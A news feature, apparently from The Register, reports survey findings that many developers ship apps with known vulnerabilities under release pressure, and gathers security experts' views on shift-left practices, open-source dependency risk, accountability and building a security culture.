Feature According to a recently published Osterman Research white paper, 81 per cent of developers admit to knowingly releasing vulnerable apps.
If it were a single piece of research, we might have passed it by, but the 2021 Verizon Mobile Security Index reinforced the point by concluding that some 76 per cent of devs experienced pressure to sacrifice mobile security for expediency. Then there’s the cloud applications angle, with Dynatrace research finding that 71 per cent of CISOs aren’t fully confident that code isn’t free of vulns before going live in production.
The icing on this foul-tasting statistical cake can be found in yet another report suggesting that most mobile apps from Fortune 500 organisations can be compromised in 15 minutes flat.
Cycle of application insecurity
The Osterman Research white paper identifies five key takeaways in exploring the human element as it contributes to cyber risk as far as the software development life-cycle (SDLC) is concerned. Perhaps the most contentious, yet at the same time unsurprising, is that an overwhelming majority of developers push live applications out despite knowing them to be insecure.
“I disagree that developers ‘knowingly’ release vulnerable applications,” Setu Kulkarni, VP of Strategy at WhiteHat Security, told The Register, “however, I agree that development teams release vulnerable applications.”
He argued that if development teams knew better, they would take appropriate security measures. “The reason development teams don’t know better is well articulated in the rest of the key takeaways,” Kulkarni said. “Security teams not having faith in the SDLC, struggling to shift left when applications are vulnerable in production, misaligned investment in empowering developers on security and lack of effective training.”
Erez Yalon, head of security research at Checkmarx, agreed developers who are aware of an existing vulnerability often lack the education or experience needed to understand its severity truly.
“We often hear devs mistakenly downplaying significant vulnerabilities, asking questions like ‘What are the odds someone will find and exploit this?’,” Yalon said.
In other cases, Yalon said, developers simply don’t know how to resolve an issue and “decide that figuring it out isn’t worth the time and effort”. Tactically, there can be little doubt that organisations need to understand better the impact of application vulnerabilities in more technical detail.
“Take for example cross-site scripting (XSS),” said Sean Wright, Principal Application Security Engineer at Immersive Labs, which sponsored the Osterman report. “The de-facto example of this is the alert box (script-alert-script).”
Any developer under pressure to release new functionality may, Wright suggested, be under the false assumption that the worst that can happen for their customers is an annoying popup box. “In reality, this could lead to things such as an attacker being able to steal a victim’s session, being able to redirect victims to phishing pages, or even a user’s browser being controlled using tools such as Browser Exploitation Framework (BeEF).”
One of the dangers of taking that 81 per cent “knowingly” statistic at face value is that not all vulnerabilities are high risk or, indeed, exploitable in the production environment. This means, according to Ilia Kolochenko, founder of ImmuniWeb and a member of the Europol Data Protection Experts Network, that “releasing applications with vulnerabilities is not necessarily a highly dangerous practice”.
- We've found another reason not to use Microsoft's Paint 3D – researchers
- Zoll Defibrillator Dashboard would execute contents of random Excel files ordinary users could import
- TimeCache aims to block side-channel cache attacks – without hurting performance
- Seven-year-old make-me-root bug in Linux service polkit patched
He explained how many automated security tools erroneously present various unexploitable warnings such as missing secure flags on cookies without any sensitive data and minor misconfigurations related to HTTP headers, for example, as high-risk vulnerabilities that developers readily ignore. “In many organisations, pressure from business is extreme, and developers are forced to go into production too early and fix vulnerable code in flight mode due to tough time constraints.”
The challenge, therefore, has to be finding the balance between what Simon Roe, Product Manager at Outpost24, calls release cadence and fixing things.
“A regular concern I hear from organisations when discussing a shift-left concept is the impact it will have on sprints and release cadence,” Roe told The Register. “If an organisation needs an application to be released to make a specific deadline regarding market opportunity or new features, developers are often caught between hitting that no matter what or potentially delaying the fix of critical or high-risk vulnerabilities.”
Pressure on devs to release
Indeed, dev teams are often measured by feature output, and security isn’t usually seen as a feature. “Unless security is viewed as a feature, it will be viewed as a tax,” according to Tim Mackey, Principal Security Strategist at the Synopsys CyRC (Cybersecurity Research Centre).
The cycle of application insecurity is exacerbated by the shift over the last decade towards component-driven development.
Peter Klimek, Director of Technology at Imperva, pointed out: “85–97 per cent of enterprise codebases [on GitHub] come from open-source libraries and contain 203 dependencies on average.” Those are staggering numbers, revealing how most of the application stack often isn’t really owned by the business itself.
“The challenging aspect is that a simple library containing a vulnerability may be included multiple layers deep and be brought in by another library or dependency,” Klimek continued, “and with many open-source packages barely maintained, security vulnerabilities may take weeks, months or even years (if ever) before a fix is created.”
Breaking the development security deadlock
When considering what needs to change to break the development security deadlock, it’s vital to think about where those changes should come from: bottom-up or top-down? The Osterman Research white paper reported that 20 per cent of senior management “often” sign off on unsafe apps. At the same time, 80 per cent appeared to be shifting the blame to developers for not doing their job correctly. The majority of devs, on the other hand, seem to be blaming a lack of resources. Is there a workable way to bridge the disconnect and answer the “who is ultimately responsible” question?
“From a legal viewpoint, the general trend is that the company, and sometimes top management, will be accountable for any poor security practices,” Kolochenko said. He argued that, internally, developers and security teams frequently face tensions due to polarised priorities and overall lack of resources. Most organisations allocate flagrantly insufficient budgets both for development and security.
“When an enterprise increases the number of devices, applications and cloud storage by 40 per cent every year, a ten per cent increase of the cybersecurity budget is obviously inadequate and will inevitably cause a serious security breach sooner or later,” he concluded.
Rather than shifting left in the development process, is what’s happening, then, more akin to sliding way to the right and leaving it up to enterprise incident response teams to deal with the fallout?
“I don’t believe that companies slide right on purpose,” Erez Yalon told The Register. “Incident response and late fixes are always more costly than fixing issues early in the process, not to mention the actual damage that can happen in a security breach. The phenomenon is more attributable to a lack of expertise and security knowledge than anything else.”
Mark Loveless, a security researcher and engineer at GitLab, sees developer roles continuing to shift left and take on more responsibility for traditionally operations and security-related tasks. “In 2021,” according to GitLab’s research, “more than 70 per cent of security professionals reported their teams have moved security considerations earlier into the development. That’s up from 65 per cent last year,” Loveless said.
So is the answer to the deadlock-breaking question “simply” a matter of growing security culture within the business? “Having teams understanding and working with one another without the divisive us and them situation is vital,” Immersive’s Wright insisted. “Both teams need to realise they work for the same organisation and ultimately have the same goal.” And, ultimately, this needs to come from the top down. “Management must be vested in security and embrace it, not just give it lip service.”
This is where the proverbial wheat is separated from the chaff, according to WhiteHat Security’s Kulkarni. “The ultimate accountability should rest with what I am calling CISO 2.0 — one who takes an approach of building a collaborative security culture instead of playing the blame game, building a security team that has the subject matter expertise as well as a facilitative mindset, creating a scalable security program that incorporates rapid-response as well as systematic improvements to the state of security in the organisation.”
By way of example, Kulkarni suggests that “CISO 2.0” takes a data-driven and risk-based approach to rolling out security initiatives, such as designing a tightly focused ten-minute training module to address historical vulnerability data rather than “boiling the ocean to take the entire software team through a four-hour security training”.
Get off the rostrum and ignore the nostrum
There is no panacea and no straightforward correct answer. There can be no nostrum to cure all ills, and preaching from the board rostrum isn’t the ultimate solution.
“Avoid creating a dichotomy where it must be either the developer’s or management’s fault,” advised Owen Wright, Global Penetration Testing Lead at Context, part of Accenture Security. “Long-term, the inherent security of application development frameworks needs to continue to evolve to the point where it is increasingly difficult to introduce a security flaw.”
In the meantime, Wright proffered five bullet points that can help:
- Educate developers and make it harder for them to make mistakes.
- Give developers the agency to make secure code.
- Make security matter in your project life-cycle.
- Clearly set responsibilities within an organisation and tie those responsibilities into performance metrics.
- Incentivise good behaviour. ®